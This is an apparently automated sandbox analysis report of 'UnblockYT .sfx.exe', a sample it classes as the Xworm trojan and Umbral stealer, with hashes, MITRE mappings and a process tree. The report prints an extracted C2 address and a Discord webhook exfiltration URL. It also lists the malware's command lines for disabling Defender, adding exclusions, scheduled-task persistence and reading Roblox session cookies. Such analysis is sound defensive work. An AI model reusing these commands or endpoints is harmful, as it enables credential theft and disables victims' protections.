Overview

overview

10

Static

static

3

UnblockYT .sfx.exe

windows7-x64

10

UnblockYT .sfx.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    300s
  • max time network
    289s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    05-08-2024 08:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    UnblockYT .sfx.exe

  • Size

    2.0MB

  • MD5

    d916c09287b75c30e207a4613a75e3b7

  • SHA1

    dfb8fb428e5b2cef3163b1de09bf88a71c5e84a5

  • SHA256

    b64d7ddeb7362ca3377c16143d699256c78a4c6340d4d79bf0f092d538823bd0

  • SHA512

    3beab1703dc0d0f931baf2cb7822b5a412867a3194184fca99f6be2c386048524c3e9e2e5b957f1f8fe12a0af4190fba41592fae68ce1623c81a65069e1ac8c4

  • SSDEEP

    49152:1Djlabwz9uJm2SnlA3tc4F7VP0q8bJQ555Yw6hzAdxopxRL:ZqwEKeTv0q8bG55v3q5

Score
10/10
umbralxwormcredential_accessdiscoveryexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

connection-arizona.gl.at.ply.gg:65211

Attributes
  • Install_directory

    %AppData%

  • install_file

    svchost.exe

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1249007779272982548/JNrfEnOEk9T5Uy5CL9Eht-UTb749aNfK8MBYreIOGClZHBASVuqcHQsf1pCugOHPrnQu

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 12 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 37 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Delays execution with timeout.exe 10 IoCs
    evasion
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 13 IoCs
  • Suspicious use of SendNotifyMessage 13 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\UnblockYT .sfx.exe
    "C:\Users\Admin\AppData\Local\Temp\UnblockYT .sfx.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2544
    • C:\Users\Admin\AppData\Roaming\UnblockYT .exe
      "C:\Users\Admin\AppData\Roaming\UnblockYT .exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2128
      • C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe
        "C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2868
        • C:\Users\Admin\AppData\Roaming\YTunblock.exe
          "C:\Users\Admin\AppData\Roaming\YTunblock.exe"
          4⤵
          • Drops startup file
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:2612
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\YTunblock.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1888
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YTunblock.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1224
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1336
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2784
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:776
          • C:\Users\Admin\AppData\Local\Temp\zcdvqb.exe
            "C:\Users\Admin\AppData\Local\Temp\zcdvqb.exe"
            5⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2676
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" csproduct get uuid
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1504
            • C:\Windows\system32\attrib.exe
              "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\zcdvqb.exe"
              6⤵
              • Views/modifies file attributes
              PID:1608
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\zcdvqb.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2388
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2736
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2892
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2780
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" os get Caption
              6⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1900
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" computersystem get totalphysicalmemory
              6⤵
                PID:1884
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic.exe" csproduct get uuid
                6⤵
                  PID:2104
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1896
                • C:\Windows\System32\Wbem\wmic.exe
                  "wmic" path win32_VideoController get name
                  6⤵
                  • Detects videocard installed
                  PID:1372
                • C:\Windows\system32\cmd.exe
                  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\zcdvqb.exe" && pause
                  6⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  PID:2960
                  • C:\Windows\system32\PING.EXE
                    ping localhost
                    7⤵
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Runs ping.exe
                    PID:1200
          • C:\Windows\system32\cmd.exe
            cmd /c ""C:\Users\Admin\AppData\Roaming\ .bat" "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2616
            • C:\Windows\system32\timeout.exe
              timeout /t 1 /nobreak
              4⤵
              • Delays execution with timeout.exe
              PID:2856
            • C:\Windows\system32\timeout.exe
              timeout /t 2 /nobreak
              4⤵
              • Delays execution with timeout.exe
              PID:2880
            • C:\Windows\system32\timeout.exe
              timeout /t 3 /nobreak
              4⤵
              • Delays execution with timeout.exe
              PID:1884
            • C:\Windows\system32\timeout.exe
              timeout /t 1 /nobreak
              4⤵
              • Delays execution with timeout.exe
              PID:1592
            • C:\Windows\system32\timeout.exe
              timeout /t 1 /nobreak
              4⤵
              • Delays execution with timeout.exe
              PID:1892
            • C:\Windows\system32\timeout.exe
              timeout /t 1 /nobreak
              4⤵
              • Delays execution with timeout.exe
              PID:1032
            • C:\Windows\system32\timeout.exe
              timeout /t 1 /nobreak
              4⤵
              • Delays execution with timeout.exe
              PID:2596
            • C:\Windows\system32\timeout.exe
              timeout /t 3 /nobreak
              4⤵
              • Delays execution with timeout.exe
              PID:444
            • C:\Windows\system32\timeout.exe
              timeout /t 3 /nobreak
              4⤵
              • Delays execution with timeout.exe
              PID:2456
            • C:\Windows\system32\timeout.exe
              timeout /t 3 /nobreak
              4⤵
              • Delays execution with timeout.exe
              PID:1664
      • C:\Windows\system32\taskeng.exe
        taskeng.exe {AAA98D99-543B-4986-A3A9-6A2834AA30EA} S-1-5-21-3502430532-24693940-2469786940-1000:PSBQWFYT\Admin:Interactive:[1]
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:1556
        • C:\Users\Admin\AppData\Roaming\svchost.exe
          C:\Users\Admin\AppData\Roaming\svchost.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2976
        • C:\Users\Admin\AppData\Roaming\svchost.exe
          C:\Users\Admin\AppData\Roaming\svchost.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:3024
        • C:\Users\Admin\AppData\Roaming\svchost.exe
          C:\Users\Admin\AppData\Roaming\svchost.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:1888
        • C:\Users\Admin\AppData\Roaming\svchost.exe
          C:\Users\Admin\AppData\Roaming\svchost.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:2348
        • C:\Users\Admin\AppData\Roaming\svchost.exe
          C:\Users\Admin\AppData\Roaming\svchost.exe
          2⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious use of SetWindowsHookEx
          PID:2796
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /4
        1⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:2788

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Defense Evasion

      Hide Artifacts

      1
      T1564

      Hidden Files and Directories

      1
      T1564.001

      Modify Registry

      1
      T1112

      Credential Access

      Credentials from Password Stores

      1
      T1555

      Credentials from Web Browsers

      1
      T1555.003

      Unsecured Credentials

      1
      T1552

      Credentials In Files

      1
      T1552.001

      Discovery

      Remote System Discovery

      1
      T1018

      System Information Discovery

      2
      T1082

      System Location Discovery

      1
      T1614

      System Language Discovery

      1
      T1614.001

      System Network Configuration Discovery

      1
      T1016

      Internet Connection Discovery

      1
      T1016.001

      Lateral Movement

      Collection

      Data from Local System

      1
      T1005

      Command and Control

      Web Service

      1
      T1102

      Exfiltration

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\zcdvqb.exe
        Filesize

        229KB

        MD5

        4bc09295bb5cf98d5e3df87fc1a2ed72

        SHA1

        c59cbee06c84683e59788df06c97f642ac1a402b

        SHA256

        9a7ba8617514eec0bc69b27fe7f105b8c5be4de6ae8e92be724c6d27b3f857ea

        SHA512

        a2643afeeb9e5e65ebe9a9e342b4a0d8def545ed2cb1d2e6ed76a3d6d87ed6b4858b316df1e31d70225c2a03557e14e1badb3cc74942f9f27f15285f19c77c63

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        feb5f597269efa8853b2c5ee6b53d9c3

        SHA1

        815490369a8ef92f4a607e2de60be68b2685544e

        SHA256

        89b6399413091f8bb64483d2d8a35b416afbbe725880dd911b7c85df1d6b539e

        SHA512

        d0f559c138cfa96100d0ad05d15aa432f725a8899ef1f4b2365c333d608d9663e92033dd3c6901346748c0a5c5a435446399fcffa3ac386d69d8ef0824e00584

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
        Filesize

        7KB

        MD5

        5f1d19888c3ba95395a712d0381f9dbd

        SHA1

        36cf56c0025ba61b8c5043f20144ca8dc4859f66

        SHA256

        d3fb748b46f4dae8218ec7e6216174e87b045b4c839175cb04dd7bde4c1ceba9

        SHA512

        a3dec28b51a2d4c635e54496de917534f87b3a8b36cd82feeaa1743702aa469eda7138b4e028d1721dc18eba5dc87c32b877deca86bafcdc8fd04a03086820ed

        Download Submit

      • C:\Users\Admin\AppData\Roaming\YTunblock.exe
        Filesize

        1.2MB

        MD5

        5c130e0ea8b936a34372663dd763f722

        SHA1

        cbb1efd33b28851682ae3f9699c79ffe705c780d

        SHA256

        262edf6e52c54494f19dd41c37307c6fb85bbd37820fb10df68a01f2f2fef644

        SHA512

        a4e7bc8a551507648651740ce87388929ab9c7c3c4997ba0c1fb15116a6e433e1660f11a65886b0ed7552264df74ce055a84fad4c96a057fb0b4c4c37b149f2e

        Download Submit

      • C:\Users\Admin\AppData\Roaming\YTunblock.sfx.exe
        Filesize

        1.6MB

        MD5

        10aefe8560bf4e437d2f47bd469a59ff

        SHA1

        57c72df8758b6afcaa47d3dd9b46009b0d68f7e5

        SHA256

        56a5db69837d84f160c2ad3fd7c46ab658df9979d3ba34834a8b514e63626f11

        SHA512

        d8f6fd44f11b140c36bfa1d9d732f31d5bc308887fcce3605391ce30fa2fa360379d5c47e7ea2bb9ef5d7dea5b8f82bdd0d7e643a7d7d9de37b478ac7f43646d

        Download Submit

      • C:\Users\Admin\AppData\Roaming\ .bat
        Filesize

        1KB

        MD5

        5807f01368bda72ebd943e8755fa2e0c

        SHA1

        f42940149bf0e256b14343c87f750c6cdac8ae72

        SHA256

        9c7be36ede7526e5d10e8af969dbf8d2b242ab9c52c107e9f42200fb0ee2ce2a

        SHA512

        31612135b0981a500b8b09c72809da0e66e0633885270aeb26de02c26dbdbb4d8b27299349cc352558a3c9ec18eda6840e380ca99473fde3882cbbe3e02dc107

        Download Submit

      • \Users\Admin\AppData\Roaming\UnblockYT .exe
        Filesize

        1.8MB

        MD5

        ddf02dfa6df9ee4e157d675e55a055c7

        SHA1

        d6fc1b85378c9ffae39dfaa0fc3a6876193ce933

        SHA256

        6ec4b872cd4c8aa6859574fb02187bda31fb71cbace5026c9e0d89e078b61730

        SHA512

        79b32c992e1adea1700fac6e87fe1dac0562fc6ff927f16b7464fa32793ff41cc9c1ad9caf323a87213f0cda7c32d29e155e1a5eed8f18d09819d13515b1a4a0

        Download Submit

      • memory/1888-148-0x0000000000040000-0x00000000003F2000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/1888-145-0x0000000000040000-0x00000000003F2000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/1888-144-0x0000000000040000-0x00000000003F2000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2348-159-0x0000000000990000-0x0000000000D42000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2348-156-0x0000000000990000-0x0000000000D42000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2348-155-0x0000000000990000-0x0000000000D42000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2388-94-0x000000001B630000-0x000000001B912000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2388-95-0x0000000001DF0000-0x0000000001DF8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2612-73-0x0000000000A50000-0x0000000000E02000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2612-80-0x0000000002660000-0x0000000002670000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2612-43-0x0000000000A50000-0x0000000000E02000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2612-45-0x0000000000A50000-0x0000000000E02000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2612-68-0x0000000002660000-0x0000000002670000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2676-88-0x0000000000E20000-0x0000000000E60000-memory.dmp

        Filesize

        256KB

        Download

      • memory/2736-101-0x000000001B580000-0x000000001B862000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2736-102-0x00000000027F0000-0x00000000027F8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2796-166-0x0000000000350000-0x0000000000702000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2796-167-0x0000000000350000-0x0000000000702000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2796-170-0x0000000000350000-0x0000000000702000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2976-75-0x0000000001190000-0x0000000001542000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2976-74-0x0000000001190000-0x0000000001542000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/2976-78-0x0000000001190000-0x0000000001542000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/3024-137-0x0000000001190000-0x0000000001542000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/3024-134-0x0000000001190000-0x0000000001542000-memory.dmp

        Filesize

        3.7MB

        Download

      • memory/3024-133-0x0000000001190000-0x0000000001542000-memory.dmp

        Filesize

        3.7MB

        Download